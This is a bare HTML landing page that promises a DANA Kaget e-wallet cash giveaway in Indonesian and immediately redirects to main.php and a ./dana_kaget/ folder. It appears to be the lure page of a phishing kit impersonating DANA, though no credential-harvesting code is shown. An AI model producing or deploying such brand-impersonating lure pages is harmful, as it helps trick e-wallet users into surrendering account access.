<!DOCTYPE html>
<html>
    <head>
        <title>DANA Kaget buatmu</title>
        <meta charset="UTF-8">
        <meta name="description" content="DANA Kaget Cuma buat kamu yang paling gesit! Sikat sekarang!">
        <meta name="keywords" content="dana, danakaget, receh, uang">
        <link rel="icon" type="image/x-icon" href="./assets/img/favicon/favicon.ico">
        <link rel="apple-touch-icon" sizes="180x180" href="./assets/img/favicon/apple-touch-icon.png">
        <link rel="icon" type="image/png" sizes="32x32" href="./assets/img/favicon/favicon-32x32.png">
        <link rel="icon" type="image/png" sizes="16x16" href="./assets/img/favicon/favicon-16x16.png">
        <link rel="manifest" href="./assets/img/favicon/site.webmanifest">
        <meta http-equiv='refresh' content='3; URL=main.php'>
        <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
        <meta http-equiv="Refresh" content="0; url='./dana_kaget/'" />
    </head>
</html>
